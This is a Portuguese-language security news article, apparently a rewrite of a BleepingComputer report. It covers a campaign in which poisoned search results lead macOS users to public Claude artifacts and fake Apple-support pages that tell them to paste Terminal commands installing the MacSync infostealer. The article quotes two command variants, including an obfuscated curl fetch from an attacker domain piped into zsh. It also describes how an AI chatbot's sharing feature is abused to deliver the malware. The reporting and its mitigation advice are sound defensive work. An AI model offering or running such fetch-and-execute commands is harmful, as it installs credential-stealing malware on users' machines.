Vetor de Ataque: Malware Infostealer Utiliza Artefatos do Claude

Vetor de Ataque

Um novo vetor de ataque foi identificado, onde atores de ameaça estão utilizando artefatos do modelo de linguagem Claude para distribuir malware infostealer para usuários de macOS. Os atores de ameaça estão criando artefatos maliciosos no domínio claude.ai, que são acessíveis a qualquer pessoa via links. Esses artefatos contêm instruções maliciosas que, quando executadas, permitem a instalação de malware no sistema do usuário.

Os pesquisadores da MacPaw e da AdGuard descobriram que os resultados de busca maliciosos estão sendo exibidos para várias consultas, como “online DNS resolver”, “macOS CLI disk space analyzer” e “HomeBrew”. Esses resultados levam a um artefato público do Claude ou a um artigo no Medium que imita o suporte da Apple, onde o usuário é instruído a colar um comando de shell no Terminal.

Impacto

O impacto desse ataque é significativo, pois o malware infostealer pode exfiltrar informações sensíveis do sistema, incluindo dados de chaveiro, navegador e carteiras de criptomoedas. Além disso, o malware estabelece comunicação com a infraestrutura de comando e controle (C2) usando um token e uma chave API hardcoded, e spoofa um agente de usuário do navegador macOS para se misturar com a atividade normal.

Os pesquisadores descobriram que o malware carrega um carregador de malware para o infostealer MacSync, que exfiltra informações sensíveis presentes no sistema. O malware também cria um arquivo zip com as informações roubadas e as envia para a infraestrutura C2 do ator de ameaça.

Detalhes Técnicos

Os detalhes técnicos do ataque incluem:

• Dois variantes do ataque foram observados, com comandos de shell diferentes:
  • `echo “…” | base64 -D | zsh`
  • `true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh`
• O malware estabelece comunicação com a infraestrutura C2 usando um token e uma chave API hardcoded.
• O malware spoofa um agente de usuário do navegador macOS para se misturar com a atividade normal.
• O malware carrega um carregador de malware para o infostealer MacSync.
• O malware cria um arquivo zip com as informações roubadas e as envia para a infraestrutura C2 do ator de ameaça.

Mitigação

Para mitigar esse ataque, os usuários devem:

• Exercer cautela ao executar comandos no Terminal que não sejam completamente entendidos.
• Perguntar ao chatbot sobre a segurança dos comandos fornecidos antes de executá-los.
• Evitar clicar em links maliciosos ou acessar artefatos maliciosos.
• Manter o sistema operacional e os aplicativos atualizados.
• Utilizar um antivírus confiável e atualizado.

Fontes de Inteligência: bleepingcomputer.com. Curadoria e Insights: Redação Security.

Compartilhe com sua equipe!

Sobre Últimos Posts

Redação YTI&W-News

Security | Yassutaro TI & Web

Cobertura das últimas notícias do universo da Segurança da Informação e lançamentos de soluções em TI.

• Hackers Usando Gemini no Ciclo de Ataque Cibernético 14 de Fevereiro, 2026
• Ator Suspeito de Origem Russa é Associado a Ataques com Malware CANFAIL 13 de Fevereiro, 2026
• Vulnerabilidades Críticas: Exploitação de CVE-2026-1731 e Adições ao Catálogo de Vulnerabilidades Exploradas 13 de Fevereiro, 2026
• Google Relata que Estado-Sustentados Hackers Usam Técnicas de Inteligência Artificial para Ataques Cibernéticos 12 de Fevereiro, 2026
• Avaliação Técnica: 83% dos Exploits de Ivanti EPMM Vêm de uma Única IP 12 de Fevereiro, 2026

Ver todos os posts →

Artigos relacionados

11 de Fevereiro, 2026

APT36 e SideCopy Lançam Campanhas Cruzadas para Comprometer Ambientes Windows e Linux

27 de Outubro, 2025

42. RaaS em 2025: Como o Ransomware como Serviço evoluiu e ameaça empresas brasileiras

24 de Março, 2025

11. Segurança de Dados: Como Proteger Informações Pessoais e Profissionais na Era Digital